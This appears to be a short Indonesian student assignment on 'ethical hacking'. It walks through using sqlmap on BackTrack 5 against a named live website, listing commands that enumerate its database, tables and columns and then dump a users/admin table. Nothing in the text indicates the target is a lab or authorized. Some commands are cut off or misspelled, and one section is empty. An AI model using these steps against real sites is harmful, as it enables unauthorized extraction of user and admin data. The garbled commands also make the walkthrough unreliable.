ethical hacking
TRANSCRIPT
Nama : Hilwa Rodiah M. Hasan
NIM : 09523213
Ethical Hacking
Cara 1
Tool
sqlmap adalah tools untuk melakukan testing penetrasi sql injection pada suatu web, tools ini
menurut saya adalah tools sql injection yang free paling lengkap untuk saat ini, karena memang
kegunaan nya yang sangat simple untuk sekali attack sql injection.”
Mengambil record dari database Digunakan untuk melakukan pemrosesan hasil query yang dilakukan dengan perintah mysql_query(),
dan memasukkannya ke dalam array asosiatif, array numeris atau keduanya.
Sintaks :
$row = mysql_fetch_array($hasil); $row adalah array satu record dari record $hasil yang diproses nomor record
sesuai dengan nomor urut dari proses mysql_fetch_array yang sedang dilakukan.
$hasil adalah record set yang akan diproses.
Metode Dengan cara web yang vulnerable terhadap serangan sql injection.
Hasil
Cara 2 :
1. Buka sqlmap kalian pada BackTrack 5
>> Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP
2. Setelah terbuka, tuliskan syntax berikut ex= python sqlmap.py –u
3.
Keterangan :
-u = url
--dbs = untuk mencari nama databasenya.
Setelah ketemu nama databasenya yaitu="uselessj_uj2006" tuliskan syntax berikut ex=
python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 –
tables
4.
Keterangan :
-D = nama database yang sudah di temukan tadi
--tables = untuk mencari nama table
5. Nama table akan keluar dan hasilnya ternyata ada table user, untuk melihat isi kolomnya
tuliskan syntax berikut :
ex= python sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D
uselessj_uj2006 -T tbl_users –columns
6. Dianjutkan dengan ex= pytho sqlmap.py -u
fungsi dump untuk mengambil semua isi di table admin, hasil dump bisa diliat di direktori sqlmap
itu sendiri.
Tools : Backtrack 5